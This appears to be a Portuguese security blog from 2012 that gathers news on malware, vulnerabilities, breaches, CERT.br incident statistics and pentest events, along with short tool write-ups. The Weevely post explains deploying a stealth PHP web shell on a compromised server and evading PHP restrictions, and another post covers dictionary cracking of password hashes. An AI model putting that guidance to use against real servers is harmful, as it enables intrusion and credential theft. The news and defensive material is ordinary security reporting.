Malware usa Google Docs como meio de comunicação com crackers

Pesquisadores de segurança da Symantec acharam um malware que utiliza o Google Docs, que agora é parte do Google Drive, como uma ponte para se comunicar com crackers a fim de esconder o tráfego malicioso.

O malware, uma nova versão da família Backdoor.Makadocs, utiliza o recurso de visualização do Google Drive (conhecido como Viewer) como proxy (intermediário) para receber instruções do servidor real de comando e controle. O Viewer foi projetado para permitir a exibição de uma variedade de tipos de arquivos de URLs remotas diretamente no Google Docs.

"Em violação às políticas do Google, o Backdoor.Makadocs usa essa função para acessar o seu servidor de comando e controle", disse o pesquisador da Symantec, Takashi Katsuki, na sexta-feira em um post no blog.

É possível que o autor do malware utilize essa abordagem a fim de dificultar a detecção de tráfego malicioso por produtos de segurança em nível de rede, uma vez que ele aparecerá como uma conexão criptografada - o Google Drive utiliza HTTPS como padrão - geralmente um serviço confiável, disse Katsuki.

"O uso de qualquer produto do Google para realizar este tipo de atividade é uma violação das nossas políticas de uso", disse um representante do Google na segunda-feira por e-mail. "Nós investigamos e tomamos as medidas necessárias quando ficamos cientes do abuso."

O Backdoor.Makadocs é distribuído com a ajuda de documentos em formato Rich Text Format (RTF) ou Microsoft Word (DOC), mas não explorar qualquer vulnerabilidade para instalar componentes maliciosos, disse Katsuki. "É uma tentativa de despertar interesse do usuário com o título e o conteúdo do documento e enganá-los a clicar sobre o malware e executá-lo."

Como a maioria dos programas backdoor, o Backdoor.Makadocs pode executar comandos recebidos do servidor C&C do atacante e pode roubar informações dos computadores infectados.

No entanto, um aspecto particularmente interessante da versão analisada por pesquisadores da Symantec é que o malware contém um código para detectar se o sistema operacional instalado na máquina de destino é o Windows Server 2012 ou Windows 8 - lançados pela Microsoft em setembro e outubro, respectivamente.

O malware não usa qualquer função exclusiva do Windows 8, mas a presença desse código sugere que a variante analisada é relativamente nova, disse Katsuki.

Outras sequências de códigos do malware e os nomes dos documentos-isca sugerem que ele está sendo usado para atacar usuários brasileiros. A Symantec atualmente classifica o nível de distribuição do malware baixo.

Fonte : http://idgnow.uol.com.br/internet/2012/11/19/malware-usa-google-docs-como-meio-de-comunicacao-com-crackers/?goback=%2Egde_840637_member_187529481

Falha grave e grosseira no Skype perrmite o sequestro de contas a partir apenas do email do usuario

Post curto para alertar sobre uma vulnerabilidade no Skype permite que qualquer um roube qualquer conta sabendo apenas o email do usuario. A tecnica era conhecida ha pelo menos 3 meses na Russia.

A melhor linha de defesa no momento: Substituir seu email via http://skype.com para algum pouco conhecido ou recem criado.

Fonte Original (russo): http://habrahabr.ru/post/158545/
Traducao: http://translate.google.com/translate?sl=ru&tl=en&js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&u=http%3A%2F%2Fhabrahabr.ru%2Fpost%2F158545%2F&act=url

Noticia: http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/

Mais Detalhes: http://thenextweb.com/microsoft/2012/11/14/security-hole-allows-anyone-to-hijack-your-skype-account-using-only-your-email-address/

Lançada nova versão do Nikto e ZAP – Scanners de vulnerabilidade em aplicações web

A ferramenta Nikto é uma solução open source para varredura de vulnerabilidades em aplicações web. Ela executa testes  em servidores web de múltiplos itens, incluindo mais de 65000 potenciais arquivos/CGIs inseguros, verifica versões de mais de 1250 servidores e problemas de versões específicas de mais 270 servidores.

No dia 16 foi lançada a nova versão 2.1.5 da ferramenta onde foram corrigidos alguns problemas, implementadas novas funcionalidades e melhorias.

Novas funcionalidades:

• -maxtime: tempo de execução máxima por host
• -until: executa até um tempo ou duração específica
• Entre outras

Outra ferramenta de análise de vulnerabilidades em aplicações web é o ZAP(Zed Attack Proxy) do projeto OWASP. No último dia 13 o líder do projeto, Simon Bennetts, escreveu um post citando a ferramenta e suas funcionalidades.

Veja mais informações sobre o Nikto no link.

Fonte: http://www.seginfo.com.br/lancada-nova-versao-do-nikto-e-zap-scanners-de-vulnerabilidade-em-aplicacoes-web/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+seginfo+%28Blog+SegInfo+-+Seguran%C3%A7a+da+Informa%C3%A7%C3%A3o+-+Tecnologia+-+Not%C3%ADcias%2C+Artigos+e+Novidades%29

Backdoor do phpMyAdmin no SourceForge

No último dia 25, ontem, foi identificada uma cópia corrompida do phpMyAdmin a partir do espelho “cdnetworks-kr-1″ da Coreia. Após a descoberta o espelho foi removido.

O arquivo modificado (server_sync.php) que estava sendo distribuído com obackdoor permitia que um atacante executasse códigos php remotamente. Outro arquivo (js/cross_framing_protection.js) também estava modificado.

Para os que utilizam a ferramenta verifiquem os arquivos acima e faça o download em um espelho confiável dos mesmos.

Mais informações no link.

Workshop sobre Pentest I

Olá Pessoal,

Já estão abertas as inscrições para o Workshop sobre Pentest I. O workshop de Teste de Penetração (PenTest) tem o objetivo de apresentar as metodologias de Pentest em Aplicações Web, assim como realizar oficinas práticas de ataques a aplicações vulneráveis, com uso de Ferramentas disponíveis no Backtrack5.

O Workshop será apresentado em dois encontros nos dias 10/11/12 e 17/11/12 na FAJESU em Taguatinga/DF, com carga horária total de 12h. As inscrições podem ser feitas pelo site http://www.ocpjr.com.br/index.php?option=com_seminar&Itemid=55.

Neste site você também encontrará a ementa e outras informações como valor e forma de pagamento.

Abraços

Palestra sobre Pentest

Boa tarde a todos,

Estou divulgando a palestra que estarei ministrando sobre Pentest no Dia da Liberdade de Software. O evento acontecerá no dia 15/09/12, na Fajesu. As inscrições são gratuitas, e poderão ser feitas através do seguinte link http://eventos.fajesu.edu.br/softwarefreedomday/inscricoes/index.jsf.

Ainda não consegui confirmar a data dos workshops que serão reapresentados na Faseju, estou aguardando resposta do coordenador de TI com as datas em que os laboratórios estarão disponíveis.

Leandro

Fascículo Redes Sociais e Livro em Formato ePub do CERT-BR

Lançadas duas novidades da Cartilha de Segurança para Internet:

Fascículo Redes Sociais

As redes sociais já fazem parte do cotidiano de grande parte dos usuários da Internet, mas para usá-las plenamente, é muito importante estar ciente dos riscos que elas podem representar e tomar medidas preventivas para evitá-los.

Para facilitar a disseminação de boas práticas no uso de redes sociais está sendo lançado o Fascículo Redes Sociais, que possui dicas práticas para ajudar a usar as redes sociais de forma segura. Este material é acompanhado por slides que podem ser usados para disseminar o conteúdo em palestras, treinamentos ou em sala de aula.

Livro em formato ePub

Para tornar a leitura da Cartilha mais agradável em dispositivos móveis, como tablets e smartphones, ela está sendo lançada no formato ePub.

Proteja-se contra a nova vulnerabilidade no Java – já existe módulo no Metasploit a explorando

No último dia 27 foi descoberta mais uma vulnerabilidade 0-day para o Java 1.7 atualização 6. Já existe um módulo para o Metasploit explorando essa vulnerabilidade mas ainda não há correção para tal.

Uma recomendação, enquanto a correção não é lançada, é desabilitar o Java no navegador, ou até mesmo usar a última atualização da versão 1.6 como citado no blog do ISC (Internet Storm Center).

Veja como desabilitar o Java nos navegadores:

• Apple Safari: How to disable the Java web plug-in in Safari
• Firefox: How to turn off Java applets
• Chrome: Veja em “Disable specif plug-ins” na documentação do navegador.

Mais informações sobre a vulnerabilidade e como desabilitar o plug-in no Internet Explorer no link.

Fonte: http://www.seginfo.com.br/se-proteja-contra-a-nova-vulnerabilidade-no-java-ja-existe-modulo-no-metasploit-a-explorando/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+seginfo+%28Blog+SegInfo+-+Seguran%C3%A7a+da+Informa%C3%A7%C3%A3o+-+Tecnologia+-+Not%C3%ADcias%2C+Artigos+e+Novidades%29

Google paga R$ 4 milhões a internautas que ‘hackearem’ Chrome

O Google quer que seu navegador Chrome seja hackeado. O gigante da internet anunciou um concurso que vai pagar R$ 4 milhões em prêmios a hackers que conseguirem achar bugs no software e fizerem um ataque. A ideia é que, assim, os hackers, além de ganhar prêmios, mostrem as vulnerabilidades à empresa.

 O evento ocorrerá no Canadá em outubro. São várias categorias. Por exemplo, ganha R$ 120 mil quem fizer um ataque completo; R$ 100 mil quer fizer um ataque “parcial”; R$ 80 mil quem achar bugs não no Chrome, mas no Windows, por exemplo.

 Veja mais no blog oficial do navegador.

Dia da Liberdade de Software 2012

O Dia da Liberdade de Software (SFD) é um evento sobre software livre que ocorre simultaneamente em mais duzentas cidades de diversas partes do mundo, cujo objetivo é compartilhar conhecimentos adquiridos e difundir os benefícios do uso do software livre.

A Faculdade Jesus Maria José (FAJESU), realizará a primeira edição SFD no Distrito Federal (SFD-DF/2012), em seu campus localizado na QNG 46 Área Especial nº08 CEP:72130-004 Taguatinga-DF, das 9h às 17h, no dia 15 de setembro de 2012.

O evento é gratuito e contará com Palestras, Mini-cursos, Oficina de Instalação e Distribuição de CDs com software livre.

Estarei palestrando no evento com um mini-curso de Pentest afim de apresentar conceitos e fazer uma Introdução ao Backtrack 5. Além disso fazerei uma palestra sobre introdução a Segurança da Informação apresentando conceitos básicos para quem está iniciando no assunto.

Mais informações: http://www.fajesu.edu.br/index.php?option=com_content&view=article&id=386%3Afreedom-day&catid=42%3Aeventos-fajesu&Itemid=403

Participe!

NIST divulga versão beta de guia de Detecção e Prevenção de Invasão a Sistemas

O Instituto Nacional de Padrões e Tecnologia dos Estados Unidos (NIST) lançou essa semana a versão beta de seu guia de Detecção e Prevenção de Invasão a Sistemas (IDPS), com cerca de 100 páginas contendo os princípios das tecnologias de detecção e prevenção de invasão, tecnologias, sistemas baseado em rede cabeada e sem fio, análise de comportamento de rede, IDPS baseado em hosts, integração de múltiplas tecnologias de IDPS e produos. O NIST espera até o final do mês (31/08) por comentários da comunidade de segurança da informação, corrigindo eventuais problemas no guia. Baixe a Revisão 1 do guia.

Vírus no programa nuclear do Irã toca música do AC/DC

Um vírus peculiar atacou computadores de usinas nucleares do Irã. De acordo com cientistas do país, ao entrar no sistema, o vírus começa a tocar a música “Thunderstruck” da banda australiana AC/DC.

Essa não é a primeira vez que o programa nuclear iraniano é atingido por vírus.

O Irã acusa os Estados Unidos e Israel de serem responsáveis pelo ataque cibernético.

Fonte: http://g1.globo.com/tecnologia/noticia/2012/07/virus-no-programa-nuclear-do-ira-toca-musica-do-acdc.html

Estatísticas do CERT.br: Incidentes -- 2o trimestre de 2012

Estão disponíveis em http://www.cert.br/stats/incidentes/ as estatísticas dos incidentes reportados ao CERT.br no segundo trimestre de 2012.
O número total de notificações de incidentes no segundo trimestre de 2012 foi um pouco maior que 114 mil, o que corresponde a um aumento de 30% em relação ao trimestre anterior e a uma queda de 10% em relação ao mesmo trimestre de 2011.
Abaixo segue uma análise de alguns fatos de interesse observados neste período, agrupados em categorias distintas.
Tentativas de Fraude

• As notificações relacionadas a tentativas de fraudes apresentaram crescimento de 65% em relação ao trimestre anterior e de 127% em relação ao mesmo período de 2011;
• Em relação ao primeiro trimestre de 2012, houve um aumento de 89% no número de notificações de páginas falsas de instituições financeiras e sites de comércio eletrônico (phishing clássico). Já em relação ao mesmo período de 2011, o crescimento foi de 184%. O phishing clássico continua representando mais da metade das notificações desta categoria;
• As notificações sobre cavalos de Troia, utilizados para furtar informações e credenciais, que representam 31% das notificações de tentativas de fraudes, cresceram 43% em relação ao primeiro trimestre de 2012 e 49% em relação ao segundo trimestre de 2011;
• Neste segundo trimestre, observamos um crescimento de quase 4% no número de notificações de páginas falsas não relacionadas a serviços financeiros ou comércio eletrônico em relação ao primeiro trimestre de 2012, entretanto, o número de notificações recebidas foi pouco mais de 5 vezes maior que o número de notificações recebidas no segundo trimestre de 2011.

Ataques a servidores Web

• As notificações sobre ataques a servidores Web cresceram 11% em relação ao trimestre anterior e 176% em relação ao mesmo período de 2011;
• Os atacantes exploram vulnerabilidades em aplicações Web para, então, hospedar nesses sites páginas falsas de instituições financeiras, cavalos de Troia, ferramentas utilizadas em ataques a outros servidores Web e scripts para envio de spam ou scam.

Computadores comprometidos

• No segundo trimestre de 2012 recebemos mais de 1.000 notificações de máquinas comprometidas. Este total foi quase 30% menor do que o número de notificações recebidas no primeiro trimestre de 2012 e quase 60 vezes maior que o número de notificações recebidas no segundo trimestre de 2011.
• A grande maioria das notificações de computadores comprometidos foi referente a servidores Web que tiveram suas páginas desfiguradas (defacement).

Varreduras e propagação de códigos maliciosos

• As notificações referentes a varreduras cresceram 43% em relação ao trimestre anterior e aumentaram 81% em relação ao segundo trimestre de 2011;
• As notificações de varreduras SMTP (25/TCP) continuam em destaque, atingindo quase 40% do total, no trimestre anterior elas atingiram quase 26% do total. A maior parte das reclamações foram referentes a computadores brasileiros, conectados via banda larga, que tentaram identificar relays abertos fora do Brasil, com o intuito de posteriormente enviar spam;
• Notificações relacionadas a servidores proxy, 8080/TCP e 1080/TCP também estão sendo visadas, correspondendo a cerca de 2% das notificações cada uma. Estes serviços também podem ser explorados para o envio de spam;
• O serviço de RDP (3389/TCP) tem sido visado desde o terceiro trimestre de 2011. Neste trimestre ele corresponde a 15% das notificações, ultrapassando o SSH (22/TCP) com 12% das notificações de incidentes de varredura. Os serviços TELNET (23/TCP) e FTP (21/TCP) ainda têm sido visados e correspondem a, respectivamente, quase 3% e menos de 1% das notificações de varreduras do segundo trimestre de 2012;
• As notificações de atividades relacionadas com propagação de worms e bots (categoria worm) totalizaram 9.115 incidentes neste trimestre, representando uma queda de 33% em relação ao primeiro trimestre de 2012. No segundo trimestre de 2012 as notificações quase triplicaram em relação ao segundo trimestre de 2011.

Outros incidentes reportados

• No segundo trimestre de 2012 recebemos um pouco mais de 33 mil notificações que se enquadraram na categoria "outros", correspondendo a um acréscimo de 44% em relação ao trimestre anterior e a uma queda de 62% em relação ao mesmo período de 2011;
• As notificações desta categoria são em sua maioria relacionadas a 2 tipos de incidentes: máquinas brasileiras tentando acessar arquivos de configuração de códigos maliciosos e servidores Web hospedando páginas maliciosas que infectam máquinas dos usuários através do método "drive-by-download".

CERT.br divulga estatísticas de incidentes reportados no segundo trimestre de 2012

O Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil (CERT.br) divulgou essa semana as estatísticas dos incidentes reportados no segundo trimestre de 2012. A quantidade de notificações de incidentes – aproximadamente 114 mil – foi 30% maior do que o primeiro trimestre deste ano, porém representa uma queda de 10% em relação ao segundo trimestre de 2011.

O tipo de ataque que mais cresceu foi o das tentativas de fraude: foram notificadas mais 65% em relação ao trimestre anterior, um aumento de 127% em relação ao mesmo período de 2011. Um tipo específico de ataque, o de phishing (uso de páginas falsas imitando sites, com o objetivo de capturar senhas ou dados bancários) aumentou respectivamente 89% e 184%, para sites de instituições financeiras e de comércio eletrônico, e foi mais de 5 vezes maior do que no ano passado para sites que não os de bancos e lojas online, como páginas que permitem roubo de senhas de serviços como Gmail e Facebook.

Outro dado que chama a atenção: o CERT.br registrou mais de 1000 notificações de máquinas comprometidas (em sua maioria, servidores que tiveram páginas desfiguradas, o defacement), que foi 30% menor que o primeiro trimestre de 2012 porém 60 vezes maior que o número de notificações recebidas no segundo trimestre de 2011.

Veja os dados em detalhes, incluindo estatísticas de envio de spams e serviços como RDP, SSH, TELNET eFTP em CERT.br/stats/incidentes.

Fonte:http://www.seginfo.com.br/cert-br-divulga-estatisticas-de-incidentes-reportados-no-segundo-trimestre-de-2012/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+seginfo+%28Blog+SegInfo+-+Seguran%C3%A7a+da+Informa%C3%A7%C3%A3o+-+Tecnologia+-+Not%C3%ADcias%2C+Artigos+e+Novidades%29

Hash Kracker

Kracker Hash é a ferramenta livre  tudo-em-um para recuperar a senha de hash para vários tipos de hash. Você pode usar esta ferramenta para recuperar uma senha para tipos populares de hash como MD5, SHA1, SHA256, SHA384, SHA512.

Ela utiliza um método baseado em dicionário que torna a operação de cracking simples e fácil. Você pode encontrar boa coleção de senhas (também chamado de lista de palavras) aqui e aqui

Embora ela suporte apenas o método crack Dictinary, você pode facilmente usar uma ferramenta como o Crunch, Cupp para gerar um arquivo de lista personalizada senhas e usá-lo com o 'Hash Kracker".


Hash Kracker é uma ferramenta totalmente portátil e também vem com o instalador para apoiar a instalação local e desinstalação.

Ela funciona em uma ampla gama de plataformas a partir do Windows XP até o Windows 8.

Screenshot:



Fonte: http://securityxploded.com/hash-kracker.php

Android Forums é hackeado

O Android Forums, uma comunidade online para usuários do sistema móvel da Google, foram vítimas de um ataque hacker que possivelmente comprometeu informações e senhas dos internautas, disse um administrador do Phandroid.com, na quinta-feira (12/7).

Desde terça-feira, logo após a descoberta de que o servidor que hospeda a página estava comprometido e o banco de dados do site fora invadido, membros da comunidade Android foram aconselhados a mudarem suas senhas do fórum e de outros sites que possam utilizar as mesmas informações de acesso. 

"O banco de dados dos usuários foi, no mínimo, acessado", disse um administrador da comunidade, conhecido como Phases, em um post no site. Segundo ele  é perfeitamente possível que todos os dados tenham sido baixados, e o fórum está tomando providências partindo do princípio de que isso, de fato, aconteceu.

De acordo com o post, o banco de dados continha informações sobre IDs, nomes, e-mails, senhas criptografadas e endereços de IP.

Depois do incidente, as senhas foram modificadas em sequências aleatórias, começando com cerca de 100 elementos. Todos os códigos dentro do banco de dados e o sistema de arquivos também foi revisado em busca de edições maliciosas e uploads. Outros sites da rede não foram acessados.

A invasão foi, provavelmente, uma tentativa de coleta de e-mails, segundo declarações do administrador da comunidade. "Um spammer poderia, teoricamente, tentar roubar e-mails de todos os usuários com o banco de dados. Parece que violações de segurança são, infelizmente, apenas um sinal de nossos tempos", disse Phandroid, se referindo às invasões que também aconteceram ao Yahoo e ao Formspring durante a semana. Ele também disse que está procurando por um teste de penetração que possa ajudá-lo.

Na quinta-feira (12/7),  um grupo de hackers publicou na internet uma lista de 450 mil credenciais de acesso que foram supostamente roubadas de um banco de dados associado a um serviço do Yahoo.

A rede social Formspring, afirmou na terça-feira (10/7) que também teve sua segurança violada e, possivelmente, senhas de 420 mil usuários foram roubadas e postadas em um fórum. A companhia desabilitou todos as senhas e solicitou a 28 milhões de usuários que as modificassem no próximo acesso.

Fonte: http://bit.ly/N5M97g

Servidores do Yahoo! são atacados; hackers obtêm 450.000 senhas de usuários

Cerca de 450.000 senhas e outros dados de usuários do "Yahoo Voices" foram subtraídos por um grupo hacker autodenominado D33DS Company, hoje.

Conforme informações da CNET, o grupo usou uma técnica conhecida como "SQL Injection", que  tira vantagem de falhas de segurança em bancos de dados, inserindo instruções em linguagem SQL na base.

Em comunicado divulgado na Internet, o grupo hacker esclareceu que não possui qualquer intenção de utilizar as informações vazadas. Sua intenção, de acordo com o texto, é alertar a comunidade de usuários e os administradores do Yahoo das profundas falhas de segurança que os serviços da empresa escondem há tempos.

Fonte: Fonte: http://www.superdownloads.com.br/materias/servidores-do-yahoo-atacados-hackers-obtem-450-00-senhas-de-usuarios.html#ixzz20Uf7TJgv

Malware é capaz de infectar Windows, Mac OS X e Linux

Um novo malware foi detectado e utiliza arquivos JAR auto-assinados como parte de um ataque de engenharia social para instalar uma backdoor no sistema. O arquivo JAR, que parece ter sido gerado com o Social Engineer Toolkit da TrustedSec, é capaz de instalar o malware no Windows, Mac OS X e Linux; quando um usuário permite sua execução, ele realiza o download do Shell de backdoor apropriado para a plataforma. O malware foi encontradopela F-Secure em um site do "setor de transporte colombiano".

Cada uma das diferentes versões do shell se comporta da mesma maneira, conectando-se a uma porta (8080 para Mac OS X, 8081 para Linux e 8082 para Windows) no endereço IP 186.87.69.249 (que parece ser um IP dinamicamente alocado pertencendo a uma companhia de Internet a cabo na Colômbia) para baixar o arquivo de ataque. A F-Secure afirmou inicialmente que nenhum comando ou código foi enviado através das Shells, mas eles parecem ter retirado essa afirmação. O Shell do Mac OS X parece ser um binário para Power PC e requer que o usuário instale o aplicativo de tradução Rosetta PowerPC da Apple para executá-lo.

Malwares que podem afetar o Linux normalmente são especificamente focados para ele. Mas nesse caso, os criminosos parecem ter considerado importante que sua engenharia social e os malwares de Windows e Mac OS X também funcionassem em máquinas Linux. A F-Secure afirmou que já reportou o site infectado originalmente para a verificação e retirada do conteúdo.

Fonte: http://www.linuxnewmedia.com.br/lm/noticia/malware_e_capaz_de_infectar_windows_mac_os_x_e_linux?utm_source=twitterfeed&utm_medium=twitter

Weevly - PHP Backdoor

Weevely é um backdoor PHP discreto que simula uma conexão telnet. É uma ferramenta essencial para ser injetada após a exploração de uma vulnerabilidade de uma aplicação web. Com uma permissão básica para fazer upload de arquivos PHP, você só precisa gerar e fazer o upload do código do "servidor" PHP no alvo, e executado localmente o Weevely transmiti comandos de shell.

Weevely é um programa python que lhe permitirá gerar um código  de "servidor" PHP, a fim de infectar um servidor Web e tomar o controle dele. Depois de uma exploração  bem sucedida a uma aplicação Web, através de exemplos, RFI, LFI ou MySQL LOAD DATA INFILE, você só precisa fazer o upload do código  do "servidor" PHP no alvo, e seu script python local Weevely irá transmitir ordens.


Todos os comandos são enviados através de dados escondidas no HTTP e esses comandos estão usando um  dynamic probe  de funções do sistema para contornar restrições de segurança do PHP. Weevely tentar contornar as configurações do PHP que desabilitam as funções sensíveis que executam programas externos, desativas no php.ini.


Weevely está incluído no Backtrack e Backbox e outras distribuições Linux para teste de penetração.


Mais informações acessem:
http://eromang.zataz.com/2011/10/11/weevely-stealth-tiny-php-backdoor-analysis/
http://epinna.github.com/Weevely/
http://www.pentestit.com/update-weevely-07/

Valeu galera divirtam-se testando.


Leandro.

Introdução ao Stepic: Esteganografia em imagens

Esteganografia (do grego "escrita escondida") é o estudo e uso das técnicas para ocultar a existência de uma mensagem dentro de outra. Em outras palavras, esteganografia é o ramo particular da criptologia que consiste em fazer com que uma forma escrita seja camuflada em outra a fim de mascarar o seu verdadeiro sentido.

Stepic, ferramenta usada para fazer estaganografia, e agora possui homepage com documentação e downloads.

Stepic podem ser recuperadas usando Bazaar, e instalado de maneira padrão do python. Dependendo da configuração, pode ser algo como isto:

bzr get http://domnit.org/stepic/
cd stepic
sudo ./setup.py install --prefix=/usr/local

Depende, além de Python, do Python Imaging Library (PIL). 

Veja mais em http://domnit.org/blog/2007/02/stepic.html

 

Twitter divulga relatório de pedidos de remoção de conteúdo com dados do primeiro semestre de 2012

O Twitter divulgou nesta segunda um relatório com os pedidos de de informações de usuários e remoção de conteúdo com dados relativos ao primeiro semestre de 2012. Os dados se dividem em três categorias – pedidos legais de informação, quando os governos ou agências governamenais pedem informações sobre um determinado usuário; pedidos governamentais de remoção de contas, geralmente por motivos de incitação ao ódio, violência, preconceito etc., e finalmente os pedidos de “Copyright Takedown”, quando as empresas que detém direitos reservados sobre materiais solicitam remoção de mensagens que direcionem usuários a cópias não autorizadas de filmes, músicas ou programas.
Houveram no primeiro semestre 849 pedidos de informações sobre usuários, abrangendo 1181 contas do Twitter; dessas, A grande maioria (679 pedidos, 948 contas) foram originados dos Estados Unidos. O Brasil figura na lista com “menos de 10 usuários afetados”. Já os pedidos de remoção de contas somaram apenas 6, sendo 2 da Grécia, e 1 da França, Paquistão, Turquia e Reino Unido. Finalmente, houveram 3378 pedidos de remoção de mensagens com infração de direitos reservados.
Veja mais detalhes em Twitterr Blog: Twitter Transparency Report.

Fonte: http://www.seginfo.com.br/twitter-divulga-relatorio-de-pedidos-de-remocao-de-conteudo-com-dados-do-primeiro-semestre-de-2012/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+seginfo+%28Blog+SegInfo+-+Seguran%C3%A7a+da+Informa%C3%A7%C3%A3o+-+Tecnologia+-+Not%C3%ADcias%2C+Artigos+e+Novidades%29&utm_content=Google+Reader

Duzentos e cinquenta mil infectados com o vírus DNSChanger podem ficar sem internet nesta segunda-feira – verifique se você está infectado

Nesta segunda-feira (09/07/2012), aproximadamente duzentos e cinquenta mil máquinas infectadas pelo vírus DNSChanger podem ficar sem acesso à Internet. O vírus altera os servidores de DNS (Domain Name Server), o que faz com que usuários maliciosos possam alterar os sites que o usuário visita. Por exemplo, se o usuário estiver infectado e acessar um site qualquer (por exemplo, google.com.br) o DNS alterado pode exibir um site bastante parecido com o Google (visualmente idêntico) mas que captura as senhas do usuário. De qualquer forma, o FBI conseguiu localizar os servidores DNS utilizados pelo vírus DNSChanger, e irão desligá-los – o problema é que esses 250.000 usuários podem ficar sem acesso a internet, uma vez que não tem outro servidor DNS configurado.
Para descobrir se você está infectado por este vírus, visite o site dns-ok.us. Se você ver um fundo verde, está tudo certo, porém se ver um fundo vermelho, está infectado. Altere suas configurações DNS ou procure um profissional que possa lhe auxiliar.

Fonte: http://www.seginfo.com.br/duzentos-e-cinquenta-mil-infectados-com-o-virus-dnschanger-podem-ficar-sem-internet-nesta-segunda-feira-verifique-se-voce-esta-infectado/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+seginfo+%28Blog+SegInfo+-+Seguran%C3%A7a+da+Informa%C3%A7%C3%A3o+-+Tecnologia+-+Not%C3%ADcias%2C+Artigos+e+Novidades%29&utm_content=Google+Reader

O “super seguro” SecurID 800 da RSA é crackeado por cientistas

Um dos dispositivos mais utilizados para proteger as redes e dados corporativos, os tokens da RSA, tiveram a sua criptografia quebrada por um grupo de cientistas. A Ars Techinca publicou como que o time de cientistas conseguiu esse feito, e que requer apenas 13 minutos para quebrar a criptografia do até então “super seguro” SecurID 800 da RSA.

Se os dispositivos como o SecurID 800 são considerados um “Fort Knox”, a criptografia funciona como um carro blindado, que é utilizado para proteger o conteúdo digital durante a transmissão. O ataque funciona através da exploração de pequenas vulnerabilidades repetidamente, até que o conteúdo seja convertido em texto puro. Uma versão do ataque utiliza uma variação melhorada da técnica utilizada em 1998, que funciona em chaves que utilizam o algoritmo de criptografia da RSA. Através de milhares de alterações sutis do texto cifrado, e passando por processos individuais de importação, o hacker pode gradativamente descobrir o texto que se esconde atrás da criptografia, de acordo com D. Bleichenbacher, o cientista que descobriu a falha de segurança. Já que as técnicas necessárias dependem de um “padding” dentro do envelope criptográfico para produzir pistas sobre o seu conteúdo, os especialistas em criptografia chamam esse ataque de “padding oracle attack”.

O mesmo ataque também funciona em vários outros dispositivos, como o eTokenPro e iKey 2032 da SafeNet, o CyberFlex da Gemalto e outros. A natureza do ataque requer que o hacker tenha acesso físico ao token, o que “ajuda” um pouco. De qualquer forma, a RSA está ciente do problema e já está trabalhando em uma correção.

Uma versão desse estudo, “Efficient Padding Oracle Attacks on Cryptographic Hardware“, está disponível para download.

Fonte: goo.gl/VzlAJ

Falha em processadores Intel 64-bit permite ataque de escalada de privilégios

Foi descoberta uma falha nos processadores Intel 64-bit que pode ser explorada por usuários maliciosos. A falha é na instrução SYSRET e afeta todos os sistemas operacionais, tanto em sistemas Windows quanto em GNU/Linux e FreeBSD. O bug permite a escalada de privilégios, ou seja, um atacante que já tenha acesso local a máquina – ainda que em usuário restrito, com poucas permissões – pode executar código com permissões de administrador, ou ainda sair do ambiente de máquina virtual e executar código na máquina hospedeira, em ambientes virtualizados. Veja mais detalhes na US-CERT Vulnerability Note VU#649219 – SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware.


Fonte: http://www.seginfo.com.br/falha-em-processadores-intel-64-bit-permite-ataque-de-escalada-de-privilegios/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+seginfo+%28Blog+SegInfo+-+Seguran%C3%A7a+da+Informa%C3%A7%C3%A3o+-+Tecnologia+-+Not%C3%ADcias%2C+Artigos+e+Novidades%29

Vulnerabilidade no Microsoft XML Core Services pode permitir a execução remota de código

A Microsoft está ciente de ataques ativos que aproveitam uma vulnerabilidade no Microsoft XML Core Services 3.0, 4.0, 5.0 e 6.0. A vulnerabilidade pode permitir a execução remota de código se um usuário visualizar uma página da Web especialmente criada no Internet Explorer. Não há como o invasor forçar os usuários a visitarem o site mal-intencionado. Em vez disso, o invasor teria que convencer os usuários a visitar o site, geralmente fazendo com que eles cliquem em um link em um e-mail ou mensagem do Instant Messenger que leva o usuário ao site do invasor. A vulnerabilidade afeta todas as versões com suporte do Microsoft Windows e todas as edições com suporte do Microsoft Office 2003 e 2007.

A vulnerabilidade existe quando MSXML tenta acessar um objeto na memória que não foi inicializada, podendo corromper a memória de tal forma que um invasor pode executar o código arbitrário no contexto do usuário conectado.

Estamos trabalhando ativamente com os parceiros em nosso programa Microsoft Active Protections Program(MAPP) para fornecer informações que eles possam usar para oferecer proteção mais ampla aos clientes. Para obter informações sobre proteções lançadas por parceiros do MAPP, consulte Parceiros do MAPP com Proteções Atualizadas.

Após concluir a investigação, a Microsoft tomará as medidas apropriadas para ajudar a proteger seus clientes. Isso pode incluir o fornecimento de uma atualização de segurança através do nosso processo de lançamento mensal ou em regime excepcional, dependendo das necessidades dos clientes.

http://technet.microsoft.com/pt-br/security/advisory/2719615 

http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462 

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889 

Publicado: terça-feira, 12 de junho de 2012

BoxCryptor

O BoxCryptor permite criptografar pastas inteiras utilizando o padrão AES-256. Qualquer arquivo armazenado na unidade virtual BoxCryptor é individualmente criptografado e armazenado na pasta de destino. Para adicionar uma camada de segurança, BoxCryptor também pode criptografar arquivos por nomes.

A pasta que contém arquivos criptografados podem então ser enviados para a cloud por provedores como Dropbox, Google Drive ou Windows Sky Drive.

O BoxCryptor suporta o Windows , MacOS X, iOS e Android.

Deve usar o BoxCryptor quando:

• Você deseja armazenar os arquivos altamente sensíveis na cloud
• Seus contratos, seus dados bancários ou sua dissertação
• Deseja salvar suas informações Top Secret
• Qualquer um que é frequente viaja

Baixe aqui BoxCryptor

Fonte: http://www.pentestit.com/boxcryptor-encrypt-aes256/

O OWASP ModSecurity Core Rule Set Project (CRS) 2.2.5 foi liberado

